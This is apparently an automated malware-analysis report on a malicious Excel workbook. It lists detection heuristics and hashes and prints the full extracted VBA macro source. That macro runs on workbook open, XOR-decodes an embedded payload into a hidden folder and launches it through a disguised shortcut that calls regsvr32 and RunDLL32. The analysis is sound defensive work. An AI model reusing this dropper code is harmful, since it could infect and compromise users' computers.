MALICIOUS
258
Risk Score
Heuristics 8
-
XOR-encoded strings (key 0x4A) critical SC_XOR_ENCODEDFound 2 Windows library/API name(s) XOR-encoded with single-byte key 0x4A: 'kernel32.dll', 'VirtualProtect'
Disassembly
x86 disassembly · validity: uncertain (0.553) — 1/1 branch targets land on an instruction boundary (100% coherence)0000B28F 212f and dword ptr [edi], ebp 0000B291 38242f cmp byte ptr [edi + ebp], ah 0000B294 267978 jns 0xb30f 0000B297 642e26264a dec edx 0000B29C 03242c add esp, dword ptr [esp + ebp] 0000B29F 251f3a2625 and eax, 0x25263a1f 0000B2A4 2b2e sub ebp, dword ptr [esi] 0000B2A6 2f das 0000B2A7 38642e26 cmp byte ptr [esi + ebp + 0x26], ah 0000B2AB 264a dec edx 0000B2AD 392f cmp dword ptr [edi], ebp 0000B2AF 3e15192f293f adc eax, 0x3f292f19 0000B2B5 3823 cmp byte ptr [ebx], ah 0000B2B7 3e331a xor ebx, dword ptr ds:[edx] 0000B2BA 38253e252925 cmp byte ptr [0x2529253e], ah 0000B2C0 264a dec edx 0000B2C2 0d2f3e182f or eax, 0x2f183e2f 0000B2C7 393a cmp dword ptr [edx], edi 0000B2C9 2524392f19 and eax, 0x192f3924 0000B2CE 3e382f cmp byte ptr ds:[edi], ch 0000B2D1 2b27 sub esp, dword ptr [edi] 0000B2D3 4a dec edx 0000B2D4 07 pop es 0000B2D5 2f das 0000B2D6 27 daa 0000B2D7 253833193e and eax, 0x3e193338 0000B2DC 382f cmp byte ptr [edi], ch 0000B2DE 2b27 sub esp, dword ptr [edi] 0000B2E0 4a dec edx 0000B2E1 2d2f3e1503 sub eax, 0x3153e2f 0000B2E6 3e2f das 0000B2E8 27 daa 0000B2E9 4a dec edx 0000B2EA 053a2f382b add eax, 0x2b382f3a
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell "RunDLL32.EXE shell32.dll,ShellExec_RunDLL " & Chr(34) & n4lpppiDcX08yM & d1C6kWo5qGIcZ & Chr(34), 0 -
LOLBin reference in VBA critical OLE_VBA_LOLBINLOLBin reference in VBAMatched line in script
sl88rbqsvJ4.TargetPath = "C:\Windows\System32\regsvr32.exe" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set bhJpP = CreateObject("new:{0D43FE01-F093-11CF-8940-00A0C9054228}") -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
hMZRAtjSR = Environ("LOCALAPPDATA") & "\Serv" -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4561 bytes |
SHA-256: 63eb849d8cb3c752479d2e21bd0fb702cf2604c3f6ff1bc669e20f8ac5bced80 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function BnitWDvCj() As String
Dim hMZRAtjSR As String
Dim bhJpP As Object
hMZRAtjSR = Environ("LOCALAPPDATA") & "\Serv"
Set bhJpP = CreateObject("new:{0D43FE01-F093-11CF-8940-00A0C9054228}")
If Not bhJpP.FolderExists(hMZRAtjSR) Then
bhJpP.CreateFolder (hMZRAtjSR)
Else
End If
BnitWDvCj = hMZRAtjSR
End Function
Function cWnFD5ECd8Gw9b(ThGHAhmxQ() As Byte, yrZxqN3O As Byte) As Byte()
Dim MIoNQFixNBXX As Long
Dim LkTacRo5NzGc() As Byte
ReDim LkTacRo5NzGc(LBound(ThGHAhmxQ) To UBound(ThGHAhmxQ))
For MIoNQFixNBXX = LBound(ThGHAhmxQ) To UBound(ThGHAhmxQ)
LkTacRo5NzGc(MIoNQFixNBXX) = ThGHAhmxQ(MIoNQFixNBXX) Xor yrZxqN3O
Next MIoNQFixNBXX
cWnFD5ECd8Gw9b = LkTacRo5NzGc
End Function
Function gPfWuMRpyskE(fileName As String)
Dim hjadgqwdbku As String
Dim gsdfsdf As Byte
Dim asdasdascasc() As Byte
Dim kjhjtyjvbnnfd() As Byte
Dim fdsjkhfdsjklnfs As Integer
Dim tyuiojlkh As Long
hjadgqwdbku = fileName
gsdfsdf = Asc("J")
fdsjkhfdsjklnfs = FreeFile
Open hjadgqwdbku For Binary Access Read As #fdsjkhfdsjklnfs
tyuiojlkh = LOF(fdsjkhfdsjklnfs)
ReDim asdasdascasc(0 To tyuiojlkh - 1)
Get #fdsjkhfdsjklnfs, , asdasdascasc
Close #fdsjkhfdsjklnfs
kjhjtyjvbnnfd = cWnFD5ECd8Gw9b(asdasdascasc, gsdfsdf)
Open hjadgqwdbku For Binary Access Write As #fdsjkhfdsjklnfs
Put #fdsjkhfdsjklnfs, , kjhjtyjvbnnfd
Close #fdsjkhfdsjklnfs
End Function
Sub MrAyjD2rl(QRYSKkuXeU As String, SsUI As String)
Dim bhJpP As Object
Dim uDO5QeoeYCZ As String
Dim sVXb2RfN As String
Set bhJpP = CreateObject("Scripting.FileSystemObject")
uDO5QeoeYCZ = Environ("TEMP")
sVXb2RfN = bhJpP.BuildPath(uDO5QeoeYCZ, SsUI)
If bhJpP.FileExists(sVXb2RfN) Then
bhJpP.CopyFile sVXb2RfN, QRYSKkuXeU
End If
Set bhJpP = Nothing
End Sub
Sub VhRwO4WtSm()
Dim uv1YWDCyOnxwN As Object
Dim s6WjBf8hE As Object
Dim e6IbjCVf As Object
Dim nLb39ozpR As String
Dim ZfUebm89krgz As String
Dim hMZRAtjSR As String
Dim GWC05BplCrglUAd As String
GWC05BplCrglUAd = "0x00bac729fe.log"
If Dir(hMZRAtjSR & "\0x00bac729fe.log") = "" Then
hMZRAtjSR = BnitWDvCj()
Call MrAyjD2rl(hMZRAtjSR & "\0x00bac729fe.log", GWC05BplCrglUAd)
'Call Pc0riX9L1HYlDKY(hMZRAtjSR & "\0x00bac729fe.log", "\0x781da2b1c3")
'Call i8lh(hMZRAtjSR & "\0x00bac729fe.log", "\0x781da2b1c3")
gPfWuMRpyskE (hMZRAtjSR & "\0x00bac729fe.log")
Set BDYBXoXN2 = CreateObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B")
n4lpppiDcX08yM = BDYBXoXN2.ExpandEnvironmentStrings("%appdata%") + "\Microsoft\Windows\"
d1C6kWo5qGIcZ = "Protection overview.lnk"
Set sl88rbqsvJ4 = BDYBXoXN2.CreateShortcut(n4lpppiDcX08yM & d1C6kWo5qGIcZ)
sl88rbqsvJ4.TargetPath = "C:\Windows\System32\regsvr32.exe"
sl88rbqsvJ4.Arguments = " /u /s " & Chr(34) & hMZRAtjSR & "\0x00bac729fe.log" & Chr(34)
sl88rbqsvJ4.Description = ""
sl88rbqsvJ4.WindowStyle = "0"
sl88rbqsvJ4.WorkingDirectory = n4lpppiDcX08yM
sl88rbqsvJ4.Save
Set sl88rbqsvJ4 = Nothing
' execute sl88rbqsvJ4 TitQzflyfw
Shell "RunDLL32.EXE shell32.dll,ShellExec_RunDLL " & Chr(34) & n4lpppiDcX08yM & d1C6kWo5qGIcZ & Chr(34), 0
End If
End Sub
Sub Workbook_open()
Dim rSDI94TRmtiDL As OLEObject
Set rSDI94TRmtiDL = Sheet1.OLEObjects(1)
rSDI94TRmtiDL.Copy
Dim TgKXzG3crsgMKgC1 As Object
Set TgKXzG3crsgMKgC1 = CreateObject("ADODB.Stream")
TgKXzG3crsgMKgC1.Type = 1
TgKXzG3crsgMKgC1.Open
TgKXzG3crsgMKgC1.Close
VhRwO4WtSm
End Sub
|
|||
ole10native_00.bin |
ole-package | OLE Ole10Native stream: MBD000064B2/Ole10Native | 40278 bytes |
SHA-256: 2e6ac7112a6f4a8a3df017e74c7192f3ec6fead38218a092bb405098684f93b3 |
|||
ole10native_00_0x00bac729fe.log |
ole-package-payload | OLE Ole10Native payload: MBD000064B2/Ole10Native; display_name=0x00bac729fe.log; full_path=C:\Users\user\AppData\Local\Temp\0x00bac729fe.log; temp_path=; def_file= | 39936 bytes |
SHA-256: 37946cb6ca884e446e897fa4af2de9f765a0835dc203ec04a15dd01add3c6c6f |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
380 of 410 identifiers look randomly generated (e.g. 'rJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ') — consistent with name-mangling obfuscation. Carved artifact contains 6 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.